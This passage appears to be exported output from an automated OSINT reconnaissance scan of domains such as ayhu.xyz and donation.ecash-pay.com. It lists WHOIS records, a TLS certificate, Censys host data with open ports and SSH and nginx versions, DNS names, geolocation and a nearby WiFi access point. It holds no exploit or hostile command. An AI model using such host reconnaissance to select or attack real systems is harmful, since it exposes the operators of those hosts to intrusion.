Admin Email: BATTLEB0T.XYZ@regprivate.ru
Tech ID: yyj-fcbflruqmlro
Tech Name: Protection of Private Person
Tech Street: PO box 87, REG.RU Protection Service
Tech City: Moscow
Tech State/Province:
Tech Postal Code: 123007
Tech Country: RU
Tech Phone: +7.4955801111
Tech Phone Ext:
Tech Fax: +7.4955801111
Tech Fax Ext:
Tech Email: BATTLEB0T.XYZ@regprivate.ru
Name Server: daphne.ns.cloudflare.com
Name Server: skip.ns.cloudflare.com
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023.05.12T05:44:06Z <<<
For more information on Whois status codes, please visit
https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en.
TERMS OF USE: The Whois and RDAP services are provided by REG.RU, and contain
information pertaining to Internet domain names registered by our
customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) Registrar of Domain Names REG.RU LLC (https://www.reg.com)
|
| 2023-05-12 03:12:53 | Physical Location | No | numverify | 0 | 0 | 3 | 0 | None | Phoenix, US | +14806242505 |
| 2023-05-12 03:23:15 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.3:8443 | 188.114.96.0/24 |
| 2023-05-12 02:56:16 | Web Technology | No | Tool - WAFW00F | 0 | 0 | 2 | 0 | None | None None | www.ayhu.xyz |
| 2023-05-12 03:03:18 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | ayhu.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:88:a7:3c:db:48:4e:7a:5b:30:55:60:8f:23:20:34:8b:3f
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 13 19:16:54 2022 GMT
Not After : Mar 13 19:16:53 2023 GMT
Subject: CN=*.ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:ed:3c:4c:c6:51:31:a3:0e:29:e8:d9:ba:56:72:
ca:d6:92:a9:ca:6b:b2:16:4e:5d:b5:eb:62:3f:02:
41:f1:08:06:a9:cd:7b:f9:04:b2:4c:8e:fb:65:31:
b3:75:c9:6a:7a:3f:e2:3e:46:f0:3e:66:e4:c8:3d:
cb:d8:17:7d:09:c3:b8:4b:0b:d8:99:0b:f7:8b:94:
1b:46:cc:ac:01:f0:8a:0c:c3:ce:98:ae:96:9a:d8:
ee:30:0d:83:be:56:f2:fa:d2:51:6c:e6:b5:3d:4d:
38:62:17:66:35:98:3b:99:b8:ad:43:ad:7a:14:a8:
2a:90:0e:e4:de:5f:31:31:ab:48:0a:dd:2d:64:89:
33:f3:db:a0:b1:f9:a9:c3:da:71:2f:32:05:fa:a1:
40:b4:5f:a2:f6:e5:8b:5d:99:bb:a1:c7:ff:78:70:
fa:fe:96:c0:01:b6:36:4c:98:38:f0:fd:c2:63:a9:
72:11:2f:85:1a:a3:bf:b4:96:2f:f2:45:ce:b3:c4:
6b:ba:0f:b8:a2:6a:78:27:5b:76:b0:c8:42:4e:41:
26:4e:0a:34:15:4a:e9:08:7d:32:c0:a0:48:38:a7:
68:49:b9:00:6e:d4:89:04:f8:ea:e6:dc:02:c0:03:
83:f0:7d:9a:bd:81:f3:1a:7f:93:46:db:06:a1:a5:
91:0f
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
11:21:5C:1E:81:22:95:8E:F4:BA:FB:D4:B0:77:CD:45:5F:AE:5E:B1
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:*.ayhu.xyz, DNS:ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
76:8a:75:f9:43:a0:e6:61:ea:e3:d4:27:72:39:cb:37:97:94:
6f:0e:14:84:fa:37:4d:a2:29:74:5d:9f:6a:9b:90:69:30:fb:
fe:80:38:47:ab:f9:93:8b:07:ed:9c:23:7a:ce:61:de:37:2c:
b5:38:61:3d:a2:a5:6a:7f:07:4e:90:cc:90:cb:f2:dc:3b:dd:
dc:6e:3d:eb:d5:9b:14:fa:58:fe:7c:53:e1:b8:07:86:02:8a:
6d:b2:53:6a:62:fd:74:1a:77:7e:1a:08:43:f8:18:7a:01:9e:
20:be:c4:45:2e:93:39:21:97:6b:7c:a2:a3:23:1c:fb:d7:fc:
ec:c5:e8:7e:b5:d7:d0:a7:3e:34:ed:91:4c:0f:7d:41:20:d6:
ae:b8:3c:8e:a2:12:49:dc:0d:d5:4c:94:96:63:8e:08:ef:7b:
64:6f:6d:f3:52:e2:36:f2:d4:c5:56:d5:b4:44:ce:06:c1:8d:
33:fb:3d:55:2f:89:df:1e:0c:e0:e0:b5:24:7c:d7:b7:f3:8a:
0e:7c:13:62:fd:45:98:d9:2b:25:ae:f4:5e:83:23:b0:c0:02:
cf:69:26:2e:fd:59:16:e1:d9:9a:02:67:43:02:ef:d7:61:4a:
bd:23:13:4e:92:4d:8b:73:c9:d8:47:4a:c4:8f:e1:ca:a1:27:
eb:65:50:df
|
| 2023-05-12 03:00:28 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | sntrup761x25519-sha512@openssh.com | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T17:34:59.155Z", "ip": "165.232.113.85", "labels": ["remote-access"], "location_updated_at": "2023-05-07T02:12:11.614586Z", "autonomous_system_updated_at": "2023-05-07T02:12:11.614661Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"kekw.battleb0t.xyz": {"record_type": "A", "resolved_at": "2023-03-14T04:19:27.651284527Z"}, "donation.ecash-pay.com": {"record_type": "A", "resolved_at": "2023-05-02T14:52:26.416247013Z"}, "ir.unoix.xyz": {"record_type": "A", "resolved_at": "2023-02-24T09:36:05.967059332Z"}, "cw8d1e.easypanel.host": {"record_type": "A", "resolved_at": "2023-04-26T18:13:54.295361033Z"}, "www.donation.ecash-pay.com": {"record_type": "CNAME", "resolved_at": "2023-05-10T14:21:06.212577360Z"}}, "names": ["cw8d1e.easypanel.host", "donation.ecash-pay.com", "ir.unoix.xyz", "kekw.battleb0t.xyz", "www.donation.ecash-pay.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.248.133.186", "extended_service_name": "SSH", "observed_at": "2023-05-11T00:26:20.725509381Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_NTT", "transport_fingerprint": {"raw": "65160,64,true,MSTNW,1460,false,false", "os": "CentOS", "id": 262}, "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "468524f109ad3925211cfe755beb70d9d361e6b16882cdc3a4df2bd7a75ea822", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "qEQb2J/p1gtQSyf7LjYce8VteZ3JO4CSQ9vSfPw9RFI=", "x": "XuSrdLhzIT/D0WARwSsM6RVmszeetwTsDG1sOtrp9H0=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "sntrup761x25519-sha512@openssh.com", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Ubuntu-3ubuntu0.1", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_8.9p1", "raw": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1"}, "hassh_fingerprint": "699519fdcc30cbcd093d5cd01e4b1d56"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Ubuntu-3ubuntu0.1"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "Linux", "vendor": "Ubuntu", "source": "OSI_APPLICATION_LAYER", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, {"product": "OpenSSH", "vendor": "OpenBSD", "version": "8.9p1", "source": "OSI_APPLICATION_LAYER", "other": {"family": "OpenSSH"}, "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:8.9p1:*:*:*:*:*:*:*", "part": "a"}]}, {"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "http": {"request": {"headers": {"_encoding": {"User_Agent": "DISPLAY_UTF8", "Accept": "DISPLAY_UTF8"}, "User_Agent": ["Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"], "Accept": ["*/*"]}, "method": "GET", "uri": "http://165.232.113.85/"}, "response": {"body": "<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.18.0 (Ubuntu)</center>\r\n</body>\r\n</html>\r\n", "_encoding": {"body": "DISPLAY_UTF8", "html_title": "DISPLAY_UTF8", "html_tags": "DISPLAY_UTF8", "body_hash": "DISPLAY_UTF8"}, "html_title": "404 Not Found", "protocol": "HTTP/1.1", "body_size": 162, "body_hashes": ["sha256:340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87", "sha1:d01c97e2944166ed23e47e4a62ff471ab8fa031f"], "status_code": 404, "body_hash": "sha1:d01c97e2944166ed23e47e4a62ff471ab8fa031f", "headers": {"Date": ["<REDACTED>"], "_encoding": {"Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Server": ["nginx/1.18.0 (Ubuntu)"]}, "html_tags": ["<title>404 Not Found</title>"], "status_reason": "Not Found"}, "supports_http2": false}, "truncated": false, "service_name": "HTTP", "_decoded": "http", "banner_hashes": ["sha256:47993c12bd45511268c274adb000951fc2436ea5a8e968b2b1f7b49fb5b05631"], "source_ip": "167.94.146.57", "extended_service_name": "HTTP", "observed_at": "2023-05-11T09:00:02.235713315Z", "banner_hex": "485454502f312e3120343034204e6f7420466f756e640d0a5365727665723a206e67696e782f312e31382e3020285562756e7475290d0a446174653a20203c52454441435445443e0d0a436f6e74656e742d547970653a20746578742f68746d6c0d0a5472616e736665722d456e636f64696e673a206368756e6b65640d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a436f6e74656e742d456e636f64696e673a20677a69700d0a", "perspective_id": "PERSPECTIVE_TELIA", "banner": "HTTP/1.1 404 Not Found\r\nServer: nginx/1.18.0 (Ubuntu)\r\nDate: <REDACTED>\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nContent-Encoding: gzip\r\n", "port": 80, "software": [{"product": "nginx", "vendor": "nginx", "version": "1.18.0", "source": "OSI_APPLICATION_LAYER", "other": {"family": "nginx"}, "uniform_resource_identifier": "cpe:2.3:a:f5:nginx:1.18.0:*:*:*:*:*:*:*", "part": "a"}]}, {"tls": {"version_selected": "TLSv1_3", "certificates": {"_encoding": {"chain_fps_sha_256": "DISPLAY_HEX", "leaf_fp_sha_256": "DISPLAY_HEX"}, "chain_fps_sha_256": ["67add1166b020ae61b8f5fc96813c04c2aa589960796865572a3c7e737613dfd", "6d99fb265eb1c5b3744765fcbc648f3cd8e1bffafdc4c2f99b9d47cf7ff1c24f"], "chain": [{"issuer_dn": "C=US, O=Internet Security Research Group, CN=ISRG Root X1", "subject_dn": "C=US, O=Let's Encrypt, CN=R3", "fingerprint": "67add1166b020ae61b8f5fc96813c04c2aa589960796865572a3c7e737613dfd"}, {"issuer_dn": "O=Digital Signature Trust Co., CN=DST Root CA X3", "subject_dn": "C=US, O=Internet Security Research Group, CN=ISRG Root X1", "fingerprint": "6d99fb265eb1c5b3744765fcbc648f3cd8e1bffafdc4c2f99b9d47cf7ff1c24f"}], "leaf_data": {"pubkey_algorithm": "ECDSA", "public_key": {"key_algorithm": "ECDSA", "ecdsa": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "nHw/fXpTPJPh7RXQY/HEObaMVLT3ke0kPIUIN0WUC1w=", "x": "mCLSeRXmhneu3ZkCqqpIEcT5t89qEuMj/T3Pv+htI2M=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}, "fingerprint": "30f014a772b2784f28cc0c8eda057a195b3550629cbebeeea563bf4fba71e48c"}, "subject_dn": "CN=donation.ecash-pay.com", "pubkey_bit_size": 256, "fingerprint": "b03940956d13966c7021bd8a13ab577121aab54f7e834862bc0c5e3c438b4b16", "issuer_dn": "C=US, O=Let's Encrypt, CN=R3", "names": ["donation.ecash-pay.com", "www.donation.ecash-pay.com"], "tbs_fingerprint": "7067e77960f4c789c8e143e4facda20855c120250ec8bfd5b30f06f36bf85662", "subject": {"common_name": ["donation.ecash-pay.com"]}, "signature": {"self_signed": false, "signature_algorithm": "SHA256-RSA"}, "issuer": {"common_name": ["R3"], "organization": ["Let's Encrypt"], "country": ["US"]}}, "leaf_fp_sha_256": "b03940956d13966c7021bd8a13ab577121aab54f7e834862bc0c5e3c438b4b16"}, "cipher_selected": "TLS_CHACHA20_POLY1305_SHA256", "ja3s": "475c9302dc42b2751db9edcac3b74891", "_encoding": {"ja3s": "DISPLAY_HEX"}}, "_encoding": {"banner": "DISPLAY_UTF8", "banne |
| 2023-05-12 03:24:21 | Web Content Type | No | Web Spider | 0 | 0 | 4 | 0 | None | text/html;charset=utf-8 | https://ayhu.xyz/lol.html?__cf_chl_f_tk=s7qF6ZO3cVvdEEZa_WmCMPM6sxOwT7Q8EvJA4xw7FTE-1683861861-0-gaNycGzNChA |
| 2023-05-12 02:46:17 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | Project hosting websites | cdn-185-199-111-153.github.com |
| 2023-05-12 03:24:50 | Country | No | Country Name Extractor | 0 | 0 | 3 | 0 | None | Turkey | Bursa, Bursa, 16350, Turkey, Asia |
| 2023-05-12 03:11:10 | Physical Coordinates | No | OpenStreetMap | 98 | 0 | 4 | 0 | None | 33.336199,-111.89446440830702 | 2155 E. GoDaddy Way, Tempe, US-AZ, US, 85284 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Wimbledon (Net ID: 00:02:CF:8C:8A:BF) | 40.2024, 29.0398 |
| 2023-05-12 02:54:03 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["-"], "Connection": ["close"], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]} | 172.67.135.9 |
| 2023-05-12 02:55:11 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"Content_Length": ["1391"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "X_Powered_By": "DISPLAY_UTF8", "X_Content_Type_Options": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Content_Security_Policy": "DISPLAY_UTF8"}, "X_Powered_By": ["Express"], "X_Content_Type_Options": ["nosniff"], "Connection": ["keep-alive"], "Content_Type": ["text/html; charset=utf-8"], "Date": ["<REDACTED>"], "Content_Security_Policy": ["default-src 'none'"]} | 87.248.157.102 |
| 2023-05-12 03:31:29 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | abuse@nicproxy.com | Domain Name: ACILACIKVETERINER.COM
Registry Domain ID: 2652209212_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.nicproxy.com
Registrar URL: http://https://nicproxy.com/
Updated Date: 2023-04-01T13:07:55Z
Creation Date: 2021-11-02T23:11:03Z
Registry Expiry Date: 2023-11-02T23:11:03Z
Registrar: Nics Telekomunikasyon A.S.
Registrar IANA ID: 1454
Registrar Abuse Contact Email: abuse@nicproxy.com
Registrar Abuse Contact Phone: +90 212 213 2963
Domain Status: ok https://icann.org/epp#ok
Name Server: NSC1.KEYUBU.NET
Name Server: NSC2.KEYUBU.NET
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:11:50Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: ACILACIKVETERINER.COM
Registry Domain ID : 2652209212_DOMAIN_COM-VRSN
Registrar WHOIS Server : whois.nicproxy.com
Registrar URL: http://www.nicproxy.com
Updated Date: 2023-04-01T12:50:32Z
Creation Date: 2021-11-02T23:11:03Z
Registrar Registration Expiration Date: 2023-11-02T23:11:03Z
Registrar: NICS Telekomunikasyon A.S.
Registrar IANA ID: 1454
Registrar Abuse Contact Email: abuse@nicproxy.com
Registrar Abuse Contact Phone: +90.2122132963
Reseller: CIZGI TELEKOMUNIKASYON A.S - NATRO
Domain Status: ok http://www.icann.org/epp#OK
Registry Registrant ID: CID-Redacted for Privacy
Registrant Name: Redacted for Privacy
Registrant Organization: Redacted for Privacy
Registrant Street: Redacted for Privacy
Registrant City: Elazig
Registrant State / Province: Redacted for Privacy
Registrant Postal Code: Redacted for Privacy
Registrant Country: TR
Registrant Phone: Redacted for Privacy
Registrant Phone Ext: Redacted for Privacy
Registrant Fax: Redacted for Privacy
Registrant Fax Ext: Redacted for Privacy
Registrant Email: https://whoisshelter.nicproxy.com/?d=ACILACIKVETERINER.COM
Registry Admin ID: CID-Redacted for Privacy
Admin Name: Redacted for Privacy
Admin Organization: Redacted for Privacy
Admin Street: Redacted for Privacy
Admin City: Redacted for Privacy
Admin State / Province: Redacted for Privacy
Admin Postal Code: Redacted for Privacy
Admin Country: Redacted for Privacy
Admin Phone: Redacted for Privacy
Admin Phone Ext: Redacted for Privacy
Admin Fax: Redacted for Privacy
Admin Fax Ext: Redacted for Privacy
Admin Email: Redacted for Privacy
Registry Tech ID: CID-Redacted for Privacy
Tech Name: Redacted for Privacy
Tech Organization: Redacted for Privacy
Tech Street: Redacted for Privacy
Tech City: Redacted for Privacy
Tech State / Province: Redacted for Privacy
Tech Postal Code: Redacted for Privacy
Tech Country: Redacted for Privacy
Tech Phone: Redacted for Privacy
Tech Phone Ext: Redacted for Privacy
Tech Fax: Redacted for Privacy
Tech Fax Ext: Redacted for Privacy
Tech Email: Redacted for Privacy
Name Server: NSC1.KEYUBU.NET
Name Server: NSC2.KEYUBU.NET
DNSSEC: Unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>>Last update of WHOIS database: 2023-05-12T03:12:00Z<<<
For more information on Whois status codes, please visit https://icann.org/epp
IMPORTANT: Port43 will provide the ICANN-required minimum data set per
ICANN Temporary Specification, adopted 04 Jun 2018.
Visit whois.nicproxy.com to look up contact data for domains
not covered by GDPR policy.
!****************************************************************************!
NICS Telekomunikasyon A.S., uluslararasi alan adi kayit otoritesi olan ICANN
onayli bir alan adi kayit firmasidir.
Bu alan adina ait web sitesinin icerigi ya da yayinlanmasiyla hicbir sekilde ilgisi yoktur.
Sadece, ICANN kurallari cercevesinde alan adinin kayit edilmesine aracilik yapmaktadir.
Bu alan adi sahibinin kayit sirasinda verdigi bilgiler yukaridaki gibidir.
NICS Telekomunikasyon A.S., bu bilgilerin dogrulugunu garanti edemez.
Daha fazla bilgi almak icin info [at] nicproxy.com adresine yazabilirsiniz.
!*****************************************************************************!
The data in the WHOIS database of NICS Telekomunikasyon A.S. is provided by
Nics Telekomunikasyon Ltd. for information purposes, and to assist persons in
obtaining information about or related to domain name registration
records. NICS Telekomunikasyon A.S. does not guarantee its accuracy.
By submitting a WHOIS query, you agree that you will use this data
only for lawful purposes and that, under no circumstances, you will
use this data to
1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via E-mail(spam) or
2) enable high volume, automated, electronic processes that apply
to Nics Telekomunikasyon Ltd. or its systems.
Nics Telekomunikasyon Ltd. reserves the right to modify these terms.
By submitting this query, you agree to abide by this policy.
NICProxy Whois Server Ver.1.2.2
|
| 2023-05-12 02:55:11 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 87.248.157.102:2079 | 87.248.157.102 |
| 2023-05-12 02:54:44 | Raw Data from RIRs | No | Censys | 0 | 0 | 3 | 0 | None | {"last_updated_at": "2023-05-11T23:52:27.325Z", "ip": "35.229.48.116", "location_updated_at": "2023-05-03T02:08:25.414245Z", "autonomous_system_updated_at": "2023-04-30T01:14:54.271779Z", "location": {"province": "South Carolina", "city": "North Charleston", "country": "United States", "coordinates": {"latitude": 32.8929, "longitude": -80.0458}, "postal_code": "29418", "country_code": "US", "timezone": "America/New_York", "continent": "North America"}, "dns": {"records": {"tarokun.io": {"record_type": "A", "resolved_at": "2023-02-22T17:14:56.790549437Z"}, "www.accasionmarquees.co.uk": {"record_type": "CNAME", "resolved_at": "2023-04-29T21:46:09.095313604Z"}, "venture-debt.a55.tech": {"record_type": "A", "resolved_at": "2023-05-05T04:55:44.464714647Z"}, "docs.delhibusiness.org": {"record_type": "CNAME", "resolved_at": "2023-04-01T23:12:43.392015511Z"}, "agnesbistro.pl": {"record_type": "A", "resolved_at": "2022-10-18T17:21:38.112136671Z"}, "paulcass.tech": {"record_type": "A", "resolved_at": "2022-10-18T03:27:30.248173724Z"}, "tuxedosnob.com": {"record_type": "A", "resolved_at": "2023-02-03T15:12:09.705739659Z"}, "www.christinecolman.com.au": {"record_type": "CNAME", "resolved_at": "2023-05-02T12:24:01.832685073Z"}, "vanshjha.com": {"record_type": "A", "resolved_at": "2023-04-20T19:46:01.617778136Z"}, "www.eczemasurvivalguide.com": {"record_type": "CNAME", "resolved_at": "2023-01-28T13:19:32.406218633Z"}, "dev.presto-assistant.com": {"record_type": "CNAME", "resolved_at": "2023-04-06T15:51:21.576675060Z"}, "www.bair.uz": {"record_type": "CNAME", "resolved_at": "2022-12-13T18:05:21.129563004Z"}, "www.tastinggrounds.com": {"record_type": "CNAME", "resolved_at": "2022-10-18T02:22:41.369894641Z"}, "www.fairbeauty.com.au": {"record_type": "A", "resolved_at": "2022-10-17T12:13:04.001655181Z"}, "vitalikgivesback.com": {"record_type": "A", "resolved_at": "2022-10-18T02:30:16.832001196Z"}, "y-design.com.au": {"record_type": "A", "resolved_at": "2023-04-14T12:25:31.059178540Z"}, "pex.polkafoundry.com": {"record_type": "CNAME", "resolved_at": "2022-10-18T04:32:16.487131257Z"}, "akshaylilani.com": {"record_type": "A", "resolved_at": "2023-04-06T02:51:29.813870033Z"}, "blissfulspringark.com": {"record_type": "A", "resolved_at": "2023-04-02T14:16:36.011211149Z"}, "billyf.dev": {"record_type": "A", "resolved_at": "2022-10-02T14:18:34.137279098Z"}, "stdau.at": {"record_type": "A", "resolved_at": "2022-10-14T12:10:37.174814624Z"}, "alpenscene.pro": {"record_type": "A", "resolved_at": "2022-12-28T17:13:43.116541796Z"}, "imsstyle.com": {"record_type": "A", "resolved_at": "2023-05-02T21:52:19.402297942Z"}, "www.javamate.net": {"record_type": "CNAME", "resolved_at": "2022-10-18T05:13:57.311443513Z"}, "yun.valaxy.site": {"record_type": "CNAME", "resolved_at": "2023-02-20T18:52:34.386641183Z"}, "dromomaniatravels.in": {"record_type": "A", "resolved_at": "2023-03-20T15:45:21.233724756Z"}, "skill-hikes.ch": {"record_type": "A", "resolved_at": "2023-02-09T12:30:48.371649363Z"}, "resume.aryanagrawal.com": {"record_type": "CNAME", "resolved_at": "2022-10-18T03:40:00.238806828Z"}, "www.swisscommerce.wedeclare.ch": {"record_type": "CNAME", "resolved_at": "2023-04-19T14:51:25.624182578Z"}, "math.hyuki.net": {"record_type": "CNAME", "resolved_at": "2022-10-18T03:50:14.717511245Z"}, 